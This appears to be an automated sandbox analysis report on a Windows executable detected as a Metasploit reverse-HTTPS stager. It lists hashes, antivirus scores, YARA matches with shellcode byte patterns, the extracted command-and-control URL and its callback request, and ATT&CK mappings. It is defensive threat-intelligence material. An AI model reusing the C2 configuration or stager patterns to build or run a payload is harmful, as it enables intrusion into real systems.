
Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name: 443_2003_https-df.exe
Analysis ID: 1636969
MD5: 8d9c0f42baf129d1b430a01463dd7870
SHA1: 4054be8879b458c034340b19311baa42218c216d
SHA256: b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags: exe, malware, Rozena, user-Joker

Detection

Metasploit
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • 443_2003_https-df.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 6160 cmdline: C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{
  "Type": "Metasploit Connect",
  "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"
}
Source | Rule | Description | Author | Strings
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_2 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
443_2003_https-df.exe | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source | Rule | Description | Author | Strings
00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5

Source | Rule | Description | Author | Strings
1.0.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
1.2.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
1.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
1.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
1.2.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5

No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 443_2003_https-df.exe | Avira: detected
Source: 443_2003_https-df.exe | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 74.82.70.131:443 -> 192.168.2.6:49683 version: TLS 1.2

Networking

Source: Malware configuration extractor | URLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1
  Host: cdn123.offseccdn.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
  Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Code function: 1_2_00000001400042B6 VirtualAlloc,InternetReadFile,1_2_00000001400042B6
Source: global traffic | DNS traffic detected: DNS query: good.com
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/-
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/L
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865381329.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488458239.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488542177.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865696292.0000000002B90000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.blackberry.com
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.blackberry.com2rI
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.blackberry.com2rI_qI
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | HTTPS traffic detected: 74.82.70.131:443 -> 192.168.2.6:49683 version: TLS 1.2

System Summary

Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 443_2003_https-df.exe, type: SAMPLE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: classification engine | Classification label: mal96.troj.winEXE@2/6@1/1
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\36652870-3caf-4f7e-98bc-f2e9f71eaaca
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: unknown | Process created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 443_2003_https-df.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: initial sample | Static PE information: section where entry point is pointing to: .jcho
Source: 443_2003_https-df.exe | Static PE information: real checksum: 0xfa97 should be: 0xfc4f
Source: 443_2003_https-df.exe | Static PE information: section name: .jcho
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: Amcache.hve.4.dr | Binary or memory string: VMware
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000045A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.drBinary or memory string: MsMpEng.exe

              Remote Access Functionality

Source: Yara match; File source: 443_2003_https-df.exe, type: SAMPLE
Source: Yara match; File source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number in parentheses is the count of matched signatures for that technique; techniques without a number had no match):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
• Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
• Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
• Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook
• Defense Evasion: Process Injection (1); DLL Side-Loading (1); Obfuscated Files or Information; Binary Padding
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
• Discovery: Security Software Discovery (11); System Information Discovery (1); Query Registry; System Network Configuration Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
• Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
• Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Ingress Tool Transfer (2)
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Behavior Graph (ID: 1636969; sample: 443_2003_https-df.exe; start date: 13/03/2025; architecture: WINDOWS; score: 96): 443_2003_https-df.exe starts and connects to good.com (74.82.70.131, port 443, source port 49683, RIMBLACKBERRYCA, Canada); WerFault.exe is then started. Signatures shown on the graph: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures.

Source | Detection | Scanner | Label
443_2003_https-df.exe | 78% | Virustotal |
443_2003_https-df.exe | 84% | ReversingLabs | Win64.Hacktool.MetaSploit
443_2003_https-df.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
https://www.blackberry.com2rI_qI | 0% | Avira URL Cloud | safe
https://www.blackberry.com2rI | 0% | Avira URL Cloud | safe
https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
good.com | 74.82.70.131 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | false | Avira URL Cloud: safe | unknown
http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://good.com/- | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7 | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.4.dr | false | | high
https://good.com/L | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.blackberry.com2rI_qI | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
